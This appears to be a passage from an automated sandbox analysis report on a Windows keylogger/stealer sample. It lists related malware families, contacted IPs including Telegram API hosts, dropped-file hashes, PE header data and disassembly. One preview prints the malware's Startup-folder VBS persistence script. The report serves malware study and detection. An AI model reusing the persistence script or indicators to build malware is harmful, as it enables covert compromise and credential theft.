                                                                                                                      • 13.107.246.45
                                                                                                                      api.telegram.orgsS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • 149.154.167.220

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      ORACLE-BMC-31898USsS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      TELEGRAMRUsS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      AMAZON-02USplZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 54.67.87.110
                                                                                                                      ARMV4L.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 54.171.230.55
                                                                                                                      wSoShbuXnJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 3.252.97.86
                                                                                                                      BLv4mI7zzY.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 13.228.81.39
                                                                                                                      4.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 18.131.143.241
                                                                                                                      ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 13.248.169.48
                                                                                                                      BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 18.139.62.226
                                                                                                                      n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 13.248.169.48
                                                                                                                      PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 13.248.169.48
                                                                                                                      02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 76.223.54.146
                                                                                                                      CLOUDFLARENETUS962Zrwh5bU.exeGet hashmaliciousAzorultBrowse
                                                                                                                      • 104.21.75.48
                                                                                                                      sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.64.1
                                                                                                                      3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.16.1
                                                                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.64.155.59
                                                                                                                      3.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      wSoShbuXnJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 104.21.86.111
                                                                                                                      1507513743282749438.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                      • 162.159.61.3

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adsS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0esS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Wru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Temp\aut79C7.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\ty1nyFUMlo.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):118126
                                                                                                                      Entropy (8bit):7.904723583054281
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:Ms2tL2KWNuJ6HghnFNEbssZe6bkzcvTwLBxMbX+:z6RrPBEbFbkzcvTwtxMbX+
                                                                                                                      MD5:4A589F39EB65BBB31A3849BB8B241C46
                                                                                                                      SHA1:AF734C5F747B63F29D1EFD4C98BAC90F9E925B97
                                                                                                                      SHA-256:A94043B7A7D971133CDA4AAB26B1F23F91396E7D6AC36111578E3A453DC4CA32
                                                                                                                      SHA-512:0C3E499A976B23439924211120CD62353968604FAF4388C96C8882AAC585867A581CEDCC689254B19453B091798DF81FB18C7A31D3540C3CAF9CECE332E14EFD
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:EA06..<..B{..=^.V..fU...q0.Rhs:.N.Z......B.8.L)......|\..B.H.V&8Y.V....06..nQ .J..L..\.N..j.~qi..2....>.].....YW.UlTJt.......eX..gs..3.U.d.Fc0..6..2.G..h.....f..`......8ej.w..&s*...34P..d@.....(u8g~.W.U.2..FQ0.V@21T.....G.....*.&..x|...b......}.....S...2...(.{&..@....V..@....aL..(|6...b..(2 .B.G..* ....@....>...qp.N...t.Z..Zd.....|. .O..<... ....K.Yr....M9.S...]N.\.|.lH....)....?.~.u...f.)...E.L'.......p..L/`....P....P.B~.(L...(..6..*.....P.........q...q2.Z.4...L.Q/..,Nc2.pg3.."u`..k<....J..(.....Q...5..F..(.@...fgB...J.Vs...(3.4..I..-wZeb.m.U.s....Sw.ec.^. #vI]rq8.Y!T9..OE.Q*....c6.W.Q..2.I...z...e.F.t..q<..,v.m2.L.[..JD.c?.Pg.(...P^)..4..V..c5.\.u...hs{].eJ../...BMP.N&.zM.#?..+T..:....@.....k...5:E.}.J$...r.8.P+.....(b5F.S)4x...R.q).....#.R...L.a..S+T+...1..4...af.......8....K..qF..... ..:....=...H.^.7..F.L.[0@#.g{X........|j..]..0..(....3...1..:.....x..1J.P. ......J..(.2P.h^bU.6..D..f.....0.Sh3y.....*.>|..A.N.T...gA.....:.L....u7..X...yW.....'S.op.S}..M...*

                                                                                                                      C:\Users\user\AppData\Local\Temp\aut86E7.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\translucently\enterogenous.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):118126
                                                                                                                      Entropy (8bit):7.904723583054281
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:Ms2tL2KWNuJ6HghnFNEbssZe6bkzcvTwLBxMbX+:z6RrPBEbFbkzcvTwtxMbX+
                                                                                                                      MD5:4A589F39EB65BBB31A3849BB8B241C46
                                                                                                                      SHA1:AF734C5F747B63F29D1EFD4C98BAC90F9E925B97
                                                                                                                      SHA-256:A94043B7A7D971133CDA4AAB26B1F23F91396E7D6AC36111578E3A453DC4CA32
                                                                                                                      SHA-512:0C3E499A976B23439924211120CD62353968604FAF4388C96C8882AAC585867A581CEDCC689254B19453B091798DF81FB18C7A31D3540C3CAF9CECE332E14EFD
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:EA06..<..B{..=^.V..fU...q0.Rhs:.N.Z......B.8.L)......|\..B.H.V&8Y.V....06..nQ .J..L..\.N..j.~qi..2....>.].....YW.UlTJt.......eX..gs..3.U.d.Fc0..6..2.G..h.....f..`......8ej.w..&s*...34P..d@.....(u8g~.W.U.2..FQ0.V@21T.....G.....*.&..x|...b......}.....S...2...(.{&..@....V..@....aL..(|6...b..(2 .B.G..* ....@....>...qp.N...t.Z..Zd.....|. .O..<... ....K.Yr....M9.S...]N.\.|.lH....)....?.~.u...f.)...E.L'.......p..L/`....P....P.B~.(L...(..6..*.....P.........q...q2.Z.4...L.Q/..,Nc2.pg3.."u`..k<....J..(.....Q...5..F..(.@...fgB...J.Vs...(3.4..I..-wZeb.m.U.s....Sw.ec.^. #vI]rq8.Y!T9..OE.Q*....c6.W.Q..2.I...z...e.F.t..q<..,v.m2.L.[..JD.c?.Pg.(...P^)..4..V..c5.\.u...hs{].eJ../...BMP.N&.zM.#?..+T..:....@.....k...5:E.}.J$...r.8.P+.....(b5F.S)4x...R.q).....#.R...L.a..S+T+...1..4...af.......8....K..qF..... ..:....=...H.^.7..F.L.[0@#.g{X........|j..]..0..(....3...1..:.....x..1J.P. ......J..(.2P.h^bU.6..D..f.....0.Sh3y.....*.>|..A.N.T...gA.....:.L....u7..X...yW.....'S.op.S}..M...*

                                                                                                                      C:\Users\user\AppData\Local\Temp\autC44E.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\translucently\enterogenous.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):118126
                                                                                                                      Entropy (8bit):7.904723583054281
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:Ms2tL2KWNuJ6HghnFNEbssZe6bkzcvTwLBxMbX+:z6RrPBEbFbkzcvTwtxMbX+
                                                                                                                      MD5:4A589F39EB65BBB31A3849BB8B241C46
                                                                                                                      SHA1:AF734C5F747B63F29D1EFD4C98BAC90F9E925B97
                                                                                                                      SHA-256:A94043B7A7D971133CDA4AAB26B1F23F91396E7D6AC36111578E3A453DC4CA32
                                                                                                                      SHA-512:0C3E499A976B23439924211120CD62353968604FAF4388C96C8882AAC585867A581CEDCC689254B19453B091798DF81FB18C7A31D3540C3CAF9CECE332E14EFD
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:EA06..<..B{..=^.V..fU...q0.Rhs:.N.Z......B.8.L)......|\..B.H.V&8Y.V....06..nQ .J..L..\.N..j.~qi..2....>.].....YW.UlTJt.......eX..gs..3.U.d.Fc0..6..2.G..h.....f..`......8ej.w..&s*...34P..d@.....(u8g~.W.U.2..FQ0.V@21T.....G.....*.&..x|...b......}.....S...2...(.{&..@....V..@....aL..(|6...b..(2 .B.G..* ....@....>...qp.N...t.Z..Zd.....|. .O..<... ....K.Yr....M9.S...]N.\.|.lH....)....?.~.u...f.)...E.L'.......p..L/`....P....P.B~.(L...(..6..*.....P.........q...q2.Z.4...L.Q/..,Nc2.pg3.."u`..k<....J..(.....Q...5..F..(.@...fgB...J.Vs...(3.4..I..-wZeb.m.U.s....Sw.ec.^. #vI]rq8.Y!T9..OE.Q*....c6.W.Q..2.I...z...e.F.t..q<..,v.m2.L.[..JD.c?.Pg.(...P^)..4..V..c5.\.u...hs{].eJ../...BMP.N&.zM.#?..+T..:....@.....k...5:E.}.J$...r.8.P+.....(b5F.S)4x...R.q).....#.R...L.a..S+T+...1..4...af.......8....K..qF..... ..:....=...H.^.7..F.L.[0@#.g{X........|j..]..0..(....3...1..:.....x..1J.P. ......J..(.2P.h^bU.6..D..f.....0.Sh3y.....*.>|..A.N.T...gA.....:.L....u7..X...yW.....'S.op.S}..M...*

                                                                                                                      C:\Users\user\AppData\Local\Temp\eupolyzoan

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\ty1nyFUMlo.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):277504
                                                                                                                      Entropy (8bit):6.941506882224219
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:01neU8qOIhWHHaqxqPpkJ0WnKexJGON3S:01neU8qOWWnN0PpLeKo3S
                                                                                                                      MD5:17465D740D45D87AB68EA46C2608616D
                                                                                                                      SHA1:FB8A1A604BC45167F301092F9D47CE614B713E5F
                                                                                                                      SHA-256:14E9E8D56D8EF9B6944EB18F0C7FD8679743E0868F532104E08CB4E920A4DD5A
                                                                                                                      SHA-512:5A8D719D61FF4DD777C0C770AC51AD43CF9D25B01A71D0B4E237333333BD99FE84D0D8FB6417C078AFA1A3DAC4AFDBCE9B0ED46DA5F12C1205BCFC0A0FBA494D
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:...ZGWNV512X..80.IC3ASLZ.WNV112XA880LIC3ASLZDWNV112XA880LIC3.SLZJH.X1.;.`.9|.h.[( l*68)$P\.; VV_8i!Va!94d> vu~ax,W\UbDN9eSLZDWNVat2X.9;0...UASLZDWNV.10YJ9h0LoG3AGLZDWNV/u6XA.80L)G3AS.ZDwNV132XE880LIC3ESLZDWNV1.6XA:80LIC3CS..DW^V1!2XA8(0LYC3ASLZTWNV112XA880..G3.SLZD7JV&!2XA880LIC3ASLZDWNV1.6XM880LIC3ASLZDWNV112XA880LIC3ASLZDWNV112XA880LIC3ASLZDwNV912XA880LIC3IsLZ.WNV112XA880b=&K5SLZ`sJV1.2XA.<0LKC3ASLZDWNV112Xa88Pb;0A"SLZSGNV1Q6XA*80LaG3ASLZDWNV112X.88pb;&_.0LZHWNV1.6XA:80LsG3ASLZDWNV112X.88rLIC3ASLZDWNV112XA|<0LIC3.SLZFWKVe.0X9.90OIC3.SL\..LV.12XA880LIC3ASLZDWNV112XA880LIC3ASLZDWNV112X.E.?...Z2..ZDWNV100[E>08LIC3ASLZ:WNVw12X.880{IC3dSLZ)WNV.12X?8802IC3%SLZ6WNVP12X.880#IC3/SLZ:WNV/3.xA82.jIA.`SLPD}.%.12R.980H:`3AY.XDWJ%.12R.;80H:f3AY.^DWJ%.12R.=80Hc.3B.Z\DWU9.12RA;.%JIC(kuLXlmNV;1.~A;.%JIC(kqLX.^NV5.d+\886d.C3K'EZDU.\116r_:.tLII.c-GZDSeV..LTA8<.LcaMLSL^oWdH3.?XA<..2GC3ExLpf)AV15.Xk&:.CIC7kq2JDWJ}1..&P884gIi.?ALZ@|N|.O!XA<.0fk='ASHqD}l($12\j8..2_C3ExLpf)YV15.Xk.F(LIG.AyRX.ONV5.4r#8J.ZI30

                                                                                                                      C:\Users\user\AppData\Local\translucently\enterogenous.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\ty1nyFUMlo.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1096704
                                                                                                                      Entropy (8bit):6.9398450149515005
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8aT7LCjhY:nTvC/MTQYxsWR7aT7mF
                                                                                                                      MD5:A3D99BCF752D0B63FA8D5515A4765777
                                                                                                                      SHA1:CEA1BB29D2D34F8C46FA6C9C645CC9753D5A918E
                                                                                                                      SHA-256:E71789B9C70A2B9BBE541BAF50D4E222BE0D1B1CC2B38BE925C01D9169158BF5
                                                                                                                      SHA-512:F7E00D50005777373D65B9065BAB7CD43AE3160554165E71C2DB7BF901C34EB0608CD854E35E3159D48F698470DB9A58E828AA6B4C2FA79C41149FC8030CDFE9
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                      Reputation:low
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...eKag..........".................w.............@.......................... ......b.....@...@.......@.....................d...|....@...Q.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....Q...@...R..................@..@.reloc...u.......v...F..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\translucently\enterogenous.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):290
                                                                                                                      Entropy (8bit):3.3780042796035423
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:DMM8lfm3OOQdUfclgMsUEZ+lX1iCQcD6YLvnriIM8lfQVn:DsO+vNlgMsQ1FD6YLmA2n
                                                                                                                      MD5:786D545310C2D787BDC4041D679BF214
                                                                                                                      SHA1:C754D6D29863E9B0F14A8A2A03A1B72705ABCE26
                                                                                                                      SHA-256:BC897BFC41537B46480BA6D110D5B63D3ACCEE6915CE23E02625A20371B50C98
                                                                                                                      SHA-512:1786A25E0B5A1CA4E8B0838049C1EFDA4596DC626F68DFC1C257DA4CB31AFDE0DCE114FFB40A1CDAAE3B6E2BF4E41353BD3CEA8ACD57ADBE70CF9A94F79E7421
                                                                                                                      Malicious:true
                                                                                                                      Reputation:low
                                                                                                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.t.r.a.n.s.l.u.c.e.n.t.l.y.\.e.n.t.e.r.o.g.e.n.o.u.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):6.9398450149515005
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:ty1nyFUMlo.exe
                                                                                                                      File size:1'096'704 bytes
                                                                                                                      MD5:a3d99bcf752d0b63fa8d5515a4765777
                                                                                                                      SHA1:cea1bb29d2d34f8c46fa6c9c645cc9753d5a918e
                                                                                                                      SHA256:e71789b9c70a2b9bbe541baf50d4e222be0d1b1cc2b38be925c01d9169158bf5
                                                                                                                      SHA512:f7e00d50005777373d65b9065bab7cd43ae3160554165e71c2db7bf901c34eb0608cd854e35e3159d48f698470db9a58e828aa6b4c2fa79c41149fc8030cdfe9
                                                                                                                      SSDEEP:24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8aT7LCjhY:nTvC/MTQYxsWR7aT7mF
                                                                                                                      TLSH:5C35BF0273D1C062FFAB92334B5AF6115BBC69260123E61F13981DB9BE705B1563E7A3
                                                                                                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                                                      File Icon

                                                                                                                      Icon Hash:aaf3e3e3938382a0

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x420577
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x67614B65 [Tue Dec 17 09:59:01 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      call 00007F7658C088B3h
                                                                                                                      jmp 00007F7658C081BFh
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                      mov esi, ecx
                                                                                                                      call 00007F7658C0839Dh
                                                                                                                      mov dword ptr [esi], 0049FDF0h
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                      mov eax, ecx
                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                      mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                      mov dword ptr [ecx], 0049FDF0h
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                      mov esi, ecx
                                                                                                                      call 00007F7658C0836Ah
                                                                                                                      mov dword ptr [esi], 0049FE0Ch
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                      mov eax, ecx
                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                      mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                      mov dword ptr [ecx], 0049FE0Ch
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      mov esi, ecx
                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [esi], 0049FDD0h
                                                                                                                      and dword ptr [eax], 00000000h
                                                                                                                      and dword ptr [eax+04h], 00000000h
                                                                                                                      push eax
                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                      add eax, 04h
                                                                                                                      push eax
                                                                                                                      call 00007F7658C0AF5Dh
                                                                                                                      pop ecx
                                                                                                                      pop ecx
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      lea eax, dword ptr [ecx+04h]
                                                                                                                      mov dword ptr [ecx], 0049FDD0h
                                                                                                                      push eax
                                                                                                                      call 00007F7658C0AFA8h
                                                                                                                      pop ecx
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      mov esi, ecx
                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [esi], 0049FDD0h
                                                                                                                      push eax
                                                                                                                      call 00007F7658C0AF91h
                                                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                                                      pop ecx

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x35184.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x10a0000x7594.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
